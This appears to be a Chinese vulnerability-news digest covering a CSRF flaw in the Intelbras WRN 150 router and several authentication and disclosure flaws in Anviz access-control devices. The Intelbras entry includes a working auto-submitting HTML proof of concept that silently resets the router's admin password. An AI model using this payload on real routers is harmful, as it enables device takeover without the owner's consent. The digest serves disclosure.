资讯
Intelbras WRN 150是波兰Intelbras公司的一款无线路由器。 Intelbras WRN 150 1.0.18版本中存在跨站请求伪造漏洞。攻击者可利用该漏洞更改密码。
Intelbras WRN 150 1.0.18 devices allow CSRF via GO=system_password.asp to the goform/SysToolChangePwd URI to change a password.
Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request ForgeryDate: 2019-10-25Exploit Author: Prof. Joas AntonioVendor Homepage: https://www.intelbras.com/pt-br/Software Link: http://en.intelbras.com.br/node/25896Version: 1.0.18Tested on: WindowsCVE : N/A##################### PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be<html><body><form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST"><input type="hidden" name="GO" value="system_password.asp"><input type="hidden" name="SYSPSC" value="0"><input class="text" type="password" name="SYSOPS" value="hack123"/><input class="text" type="password" name="SYSPS" value="mrrobot"/><input class="text" type="password" name="SYSPS2" value="mrrobot"/></form><script>document.forms[0].submit();</script></body></html>
<br />2、[Anviz access control devices 安全漏洞](https://www.anquanke.com/vul/id/1845345)
Anviz access control devices allow unverified password change which allows remote attackers to change the administrator password without prior authentication.
Anviz access control devices are vulnerable to replay attacks which could allow attackers to intercept and replay open door requests.
Anviz access control devices perform cleartext transmission of sensitive information (passwords/pins and names) when replying to query on port tcp/5010.
Anviz access control devices allow remote attackers to issue commands without a password.
Anviz access control devices expose private Information (pin code and name) by allowing remote attackers to query this information without credentials via port tcp/5010.
Anviz access control devices expose credentials (names and passwords) by allowing remote attackers to query this information without credentials via port tcp/5010.
若有收获,就点个赞吧
0 人点赞
